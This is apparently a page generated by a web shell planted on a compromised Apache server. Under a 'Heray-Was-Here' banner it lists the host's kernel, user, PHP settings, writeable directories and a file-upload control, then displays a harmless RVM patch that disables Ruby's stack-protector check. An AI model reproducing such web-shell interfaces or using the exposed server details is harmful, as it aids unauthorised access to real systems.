Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/self/root/proc/self/root/usr/local/rvm/patches/ruby/2.0.0/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/proc/self/root/usr/local/rvm/patches/ruby/2.0.0/broken_stack_protector.patch
--- trunk/configure 2013-06-27 13:16:17.000000000 +0200
+++ trunk/configure 2013-09-08 20:47:28.911451551 +0200
@@ -7424,7 +7424,7 @@
   unset ac_c_werror_flag
 fi

- if test "x$stack_protector" = xyes; then
+ if test "x$stack_protector" = xnotbroken; then

     save_LDFLAGS="$LDFLAGS"
     LDFLAGS="$LDFLAGS -fstack-protector"
@@ -7475,7 +7475,7 @@
  fi
      ;;
 esac
-    if test "x$stack_protector" = xyes; then
+    if test "x$stack_protector" = xnotbroken; then
  # RUBY_APPEND_OPTION(XCFLAGS, -fstack-protector)
  case " ${XCFLAGS-} " in #(
   *' -fstack-protector '*) :

Hry